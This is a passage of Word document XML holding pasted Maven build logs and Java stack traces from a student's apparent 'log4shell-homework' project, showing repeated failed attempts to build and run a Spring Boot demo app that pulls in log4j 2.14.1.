    </w:p>
    <w:p w14:paraId="31A486E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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD75E6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544C4D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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3DBD2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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DDC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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5D872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2117EB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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBABC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Replacing main artifact with repackaged archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE83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2C402FD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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357736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396245E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Total time:  3.256 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F8D7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Finished at: 2025-05-28T23:35:56Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77823D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5A8DD1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spring-boot:run -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAAF6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Error stacktraces are turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE737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3A42DE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256CD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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47108A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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A203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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A19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B4F16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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427E1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28F240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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B3EE6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 Using 'UTF-8' encoding to copy filtered resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD73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01CC5BD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17ECE4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760444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CB858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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672CC9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3C4358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E9EA41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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2709C9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3D7DF7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248A153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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605CF2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68D07E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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D33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410023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D6B7A4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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E856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C8FAB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2EBA43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spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB960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Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA090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Could not find or load main class com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8F9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Caused by: java.lang.ClassNotFoundException: com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A17B6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4AC05B8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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5083675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5C212C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Total time:  2.352 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA7DE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Finished at: 2025-05-28T23:36:13Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C40D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7F20DB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[ERROR] Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D94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org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BA4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(MojoExecutor.java:215)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D01A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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52885E2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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490CE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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D479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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F09C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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C358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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D92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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50A4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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBBEB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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055AC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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D2EA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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380A2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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DEF5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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85F9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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC732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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF8A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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F52C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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67C8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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579139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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E0F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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2B9D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Caused by: org.apache.maven.plugin.MojoExecutionException: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C109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org.springframework.boot.maven.RunMojo.runWithForkedJvm (RunMojo.java:101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A033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org.springframework.boot.maven.AbstractRunMojo.doRunWithForkedJvm (AbstractRunMojo.java:286)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE5E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org.springframework.boot.maven.AbstractRunMojo.run (AbstractRunMojo.java:251)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5FD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at org.springframework.boot.maven.AbstractRunMojo.execute (AbstractRunMojo.java:223)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631C39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org.apache.maven.plugin.DefaultBuildPluginManager.executeMojo (DefaultBuildPluginManager.java:137)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E293F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(MojoExecutor.java:210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86AA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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39D35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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E57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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412646D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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74795C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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE1B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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F967B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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D91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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22895E3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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF95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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243CD5F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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE872C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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C87987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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F160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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F5C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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CD6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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F338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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED400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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A78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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308B04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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032DC3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1A371C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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D55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4AAB282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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F52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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6981BF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spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A644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 Scanning for projects...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E7B7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[ERROR] Some problems were encountered while processing the POMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2494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[FATAL] Non-resolvable parent POM for com.example:log4shell-demo:0.0.1-SNAPSHOT: org.springframework.boot:spring-boot-starter-parent:pom:${spring.boot.version} was not found in https://repo.maven.apache.org/maven2 during a previous attempt. This failure was cached in the local repository and resolution is not reattempted until the update interval of central has elapsed or updates are forced and 'parent.relativePath' points at no local POM @ line 22, column 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797011C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6675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The build could not read 1 project -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5AB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4871DFD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The project com.example:log4shell-demo:0.0.1-SNAPSHOT (/home/ec2-user/log4shell-homework/pom.xml) has 1 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5C5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Non-resolvable parent POM for com.example:log4shell-demo:0.0.1-SNAPSHOT: org.springframework.boot:spring-boot-starter-parent:pom:${spring.boot.version} was not found in https://repo.maven.apache.org/maven2 during a previous attempt. This failure was cached in the local repository and resolution is not reattempted until the update interval of central has elapsed or updates are forced and 'parent.relativePath' points at no local POM @ line 22, column 13 -&gt; [Help 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995A8E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1D7D2F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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BD20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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05D7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042DD09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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA91F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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/ProjectBuildingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3502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[Help 2] http://cwiki.apache.org/confluence/display/MAVEN/UnresolvableModelException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DFC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 src/main/resources/application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE50E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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079BA9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28F70F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[ERROR] Some problems were encountered while processing the POMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29266E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[FATAL] Non-parseable POM /home/ec2-user/log4shell-homework/pom.xml: only whitespace content allowed before start tag and not p (position: START_DOCUMENT seen p... @1:1)  @ line 1, column 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275E9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40912E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The build could not read 1 project -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAF3A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4B225C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[ERROR]   The project  (/home/ec2-user/log4shell-homework/pom.xml) has 1 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00459C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Non-parseable POM /home/ec2-user/log4shell-homework/pom.xml: only whitespace content allowed before start tag and not p (position: START_DOCUMENT seen p... @1:1)  @ line 1, column 1 -&gt; [Help 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B66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43E960B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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F8D7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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5295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6D357B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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6BB9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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/ProjectBuildingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1677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[Help 2] http://cwiki.apache.org/confluence/display/MAVEN/ModelParseException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFC4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clean install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552DBC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56A80D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081C8B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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FE0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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0080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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1533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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-install-plugin/2.5.2/maven-install-plugin-2.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572D1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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-install-plugin/2.5.2/maven-install-plugin-2.5.2.pom (6.4 kB at 15 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE51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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/25/maven-plugins-25.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB4B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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/25/maven-plugins-25.pom (9.6 kB at 212 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F93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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/24/maven-parent-24.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A132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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/24/maven-parent-24.pom (37 kB at 625 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2042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https://repo.maven.apache.org/maven2/org/apache/apache/14/apache-14.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293A8D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https://repo.maven.apache.org/maven2/org/apache/apache/14/apache-14.pom (15 kB at 358 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C14D7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Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-install-plugin/2.5.2/maven-install-plugin-2.5.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D19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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-install-plugin/2.5.2/maven-install-plugin-2.5.2.jar (33 kB at 705 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D642AA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56C558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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDA9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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E81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6B419B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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF77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53B8AE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6F0997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5DF55B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28D119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8DB81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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D33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4D707D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6F855D7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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F05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5A6BA1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6E24C7B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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140EF8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D5D169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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173839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6309A3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03C2DC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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65952C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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DAF0B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8509D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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B62F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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351ED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 Building jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2917F0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66E37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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D641B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247CCB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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285F9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48B141D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Total time:  4.219 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336C8B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Finished at: 2025-05-28T23:44:00Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BDF90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4E0678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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957F73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6EB43B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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13557F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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B23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105654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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1EB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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF401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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B2D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4690D54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D52829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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169DD5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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D025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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F6B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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124625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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.pom (2.7 kB at 5.7 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282617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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EA86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Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.pom (12 kB at 278 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EF12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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B528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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.pom (7.7 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE261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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D56D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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFD5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Downloading from central: https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440436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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar (4.8 kB at 88 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098FB6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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar (24 kB at 251 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1E1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Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar (26 kB at 282 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BB7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20786E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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737C5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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B25B2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2602A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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4005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292C501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24092D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0F158D0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48D116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864593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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC05DC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5ADAE6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AB8482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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3F7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 Using 'UTF-8' encoding to copy filtered resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553636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1BE26E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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B739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0825415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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18483A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25F1E0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B3066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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE190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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F986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2065F61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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FA2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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135A4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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD89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68B36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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B13A2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4B1065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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AF5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728716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Total time:  4.182 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C9F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Finished at: 2025-05-28T23:46:15Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9BF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6E44891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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (repackage) on project log4shell-demo: Execution repackage of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D093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646710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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDF9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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A0A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55866E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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A83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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE618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(venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$ mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E9C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36F8A8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C691D7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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D84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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E39F1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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BF8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E5150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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A36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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C3E6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50A211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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484D0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263544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649746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1A7017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59524B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5179E7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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36268D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00130F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63487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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5846465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1B05C3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471810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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BBB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05C9D63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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C0E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542855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2A5994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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A99ED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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F90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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3A5A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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116B79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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
